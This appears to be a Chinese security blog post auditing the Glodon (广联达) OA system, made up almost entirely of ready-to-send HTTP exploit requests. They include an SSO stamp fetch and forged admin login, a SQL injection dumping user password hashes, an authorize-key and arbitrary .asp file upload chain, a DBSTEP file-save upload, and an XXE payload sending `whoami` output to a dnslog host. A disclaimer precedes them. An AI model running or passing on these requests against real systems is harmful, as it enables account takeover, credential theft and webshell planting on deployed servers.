1day | 广联达OA系统审计

免责声明：

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，小黑说安全及文章作者不为此承担任何责任。

0x01 漏洞分析

/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx

找到GetSSOStamp.DLL

传入usercode 参数

POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1
Host: x
Content-Type: text/xml; charset=utf-8
Content-Length: 355
SOAPAction: "http://tempuri.org/GetStamp"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetStamp xmlns="http://tempuri.org/">
      <usercode>
admin</usercode>
    </GetStamp>
  </soap:Body>
</soap:Envelope>

登录接口

/Services/Identification/Server/login.ashx?sso=1&ssoProvider=WorkflowSSO&LoginFlag=custom&UserCode=admin&LoginCredence=856F1154F61FE89FDE236B64F565502C&LoginTimestamp=758027442&service=http://xxxxxx/Portal/Frame/layoutA/Default.aspx

/Webservice/IM/Config/ConfigService.asmx

ConfigService 继承 WebService 很容易看出没有权限建立

GetIMDictionary

走进 ConfigService.getIMDictValue

直接进行拼接

POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1
Host: x
Content-Length: 428
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Content-Type: text/xml; charset=utf-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://180.140.115.138:91/Webservice/IM/Config/ConfigService.asmx?op=GetIMDictionary
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetIMDictionary xmlns="http://tempuri.org/">
      <key>1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --</key>
    </GetIMDictionary>
  </soap:Body>
</soap:Envelope>

One

获得key

当传入进来的CMD 不等于queryUplaodResult 和checkFileExists 就进入ProcessGetAuthorizeKey

需要destDir destFilename这两个参数

POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx HTTP/1.1
Host: x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

cmd=&destDir=./sysinfo/&destFilename=qrxyrgwa.asp

Two

三个参数 上传上去 然后创建文件

POST /Services/FileService/UserFiles/UserFilesUpload.ashx HTTP/1.1
Host: x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Length: 555

------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="key"

f3c7e655-9ecf-4e81-a7c1-da2e1172ff7b
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="destDir"

./sysinfo/
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="destFilename"

qrxyrgwa.asp
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="file";filename="qrxyrgwa.asp"
content-type:image/png

<% response.write("qrxyrgwa")%>
------WebKitFormBoundarytCOFhbEjc3IfYaY5--

//GB/LK/Common/ashx/WebRevisionAjax.ashx

POST /GBLKCommonashxWebRevisionAjax.ashx HTTP/1.1
Host: xxxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 152

DBSTEP V3.0     170              0                1000              
DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
TableKey=MTExMTE=
FILENAME=MS5hc3A=
123456

/GB/LK/Document/DataExchange/DataExchange.ashx

SystemName=BIM 进入下一步

很明显的XXE

POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Sec-Purpose: prefetch;prerender
Purpose: prefetch
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Length: 405

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
    <!ENTITY t SYSTEM "http://`whoami`.mw8goc.dnslog.cn/">
    ]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

原文始发于微信公众号（小黑说安全）：1day | 广联达OA系统审计